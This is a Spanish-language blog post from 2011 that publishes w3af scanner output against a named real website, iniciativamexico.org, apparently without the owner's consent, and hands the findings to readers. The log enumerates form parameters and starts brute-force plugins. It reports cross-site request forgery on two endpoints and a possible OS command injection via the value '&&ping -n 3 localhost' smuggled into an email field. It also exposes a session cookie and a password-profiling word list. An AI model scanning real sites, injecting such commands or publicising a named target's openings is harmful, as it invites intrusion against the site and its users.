Mundo Libre: Iniciativa Mexico vulnerable

Saludos Mundo Libre.

Iniciativa Mexico vulnerable

http://www.iniciativamexico.org

[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.error500
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.lang
[Wed 25 May 2011 03:26:56 PM CDT] The page language is: es
[Wed 25 May 2011 03:26:57 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:27:18 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:27:18 PM CDT] New URL found by frontpage_version plugin: http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] Starting formAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Found 4 URLs and 10 different points of injection.
[Wed 25 May 2011 03:27:18 PM CDT] The list of URLs is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:27:18 PM CDT] The list of fuzzable requests is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion | Method: POST | Parameters: (data[Friend][mail]="E-mail de ...", _method="POST", data[Prospect][nombre]="Tu Nombre ...", data[Prospect][mail]="Tu e-mail:")
[Wed 25 May 2011 03:27:25 PM CDT] The web application sent a persistent cookie.
[Wed 25 May 2011 03:27:25 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:45 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:51 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:57 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:06 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:31:06 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:31:06 PM CDT] The URL "http://www.iniciativamexico.org/" has the following allowed methods: GET, HEAD, POST.
[Wed 25 May 2011 03:31:36 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:05 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:43 PM CDT] A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.
[Wed 25 May 2011 03:45:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:49 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:46:56 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:47:11 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:40 PM CDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Wed 25 May 2011 03:50:42 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:07 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:21 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:24 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:51:47 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:51:57 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:56:48 PM CDT] The length of both pages are zero. Cant work with this.
[Wed 25 May 2011 03:57:43 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:58:13 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 04:10:46 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:50 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 04:10:52 PM CDT] Password profiling TOP 100:
[Wed 25 May 2011 04:10:52 PM CDT] - [1] Iniciativa with 1798 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [2] participar with 1794 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [3] case with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [4] INICIATIVA with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [5] Porque with 1495 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [6] proyectos with 1200 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [7] ideas with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [8] mexicano with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [9] Registro with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [10] Agosto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [11] proyecto with 897 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [12] cultura with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [13] naturales with 606 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [14] empresas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [15] necesitas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [16] gran with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [17] idea with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [18] semifinalistas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [19] finales with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [20] como with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [21] ahora with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [22] iniciativas with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [23] Registra with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [24] medios with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [25] Cobertura with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [26] comunidades with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [27] Conoce with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [28] impacto with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [29] Julio with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [30] Consejo with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [31] Informativa with 598 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [32] Existen with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [33] errores with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [34] formulario with 360 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [35] salud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [36] agua with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [37] cultural with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [38] Derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [39] derechos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [40] Preguntas with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [41] basura with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [42] democracia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [43] Todos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [44] actividad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [45] desastres with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [46] especies with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [47] transparencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [48] Frecuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [49] identidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [50] Contacto with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [51] aprendizaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [52] legalidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [53] ciencia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [54] justicia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [55] arte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [56] reciclaje with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [57] familia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [58] vivienda with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [59] adicciones with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [60] Privacidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [61] servicios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [62] cuidado with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [63] fuentes with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [64] seguridad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [65] empleo with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [66] equidad with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [67] productivos with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [68] infancia with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [69] juventud with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [70] espacios with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [71] transporte with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [72] cambio with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [73] escasez with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [74] libre with 303 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [75] manera with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [76] Junio with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [77] tener with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [78] Bases with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [79] Museo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [80] primer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [81] nuestro with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [82] mejores with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [83] separados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [84] vida with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [85] Programas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [86] requiere with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [87] requisitos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [88] buscas with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [89] quieres with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [90] return with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [91] fortalecer with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [92] Ventures with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [93] Proyectos with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [94] previo with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [95] Resultados with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [96] Importantes with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [97] mucho with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [98] forman with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [99] ejemplares with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] - [100] consentimiento with 299 repetitions.
[Wed 25 May 2011 04:10:52 PM CDT] The cookie: "CAKEPHP=g5i4raul0ohnendqo9k10d5ap6; expires=Mon, 30-Jan-2012 20:27:24 GMT; path=/" was sent by these URLs:
[Wed 25 May 2011 04:10:52 PM CDT] - http://www.iniciativamexico.org/
[Wed 25 May 2011 04:10:52 PM CDT] Finished scanning process.

osCommanding

A possible OS Commanding was found at: "http://www.iniciativamexico.org/registro_corto", using HTTP method POST. The sent post-data was: "...data[usuario][mail1]=&&ping -n 3 localhost..."Please review manually. This information was found in the request with id 5175.

GET http://www.iniciativamexico.org/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.iniciativamexico.org
Cookie: CAKEPHP=g5i4raul0ohnendqo9k10d5ap6
Content-type: application/x-www-form-urlencoded

xsrf

posr_xsrf

Cross Site request forgery vulnerabilidad

The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.

Aqui les dejo un video http://www.youtube.com/watch?v=CiXEFD-cTnw&feature=player_embedded

Hay Se las dejo.

Saludos Mundo Libre

Mundo Libre

miércoles, 25 de mayo de 2011

Iniciativa Mexico vulnerable

No hay comentarios:

Publicar un comentario

Entradas populares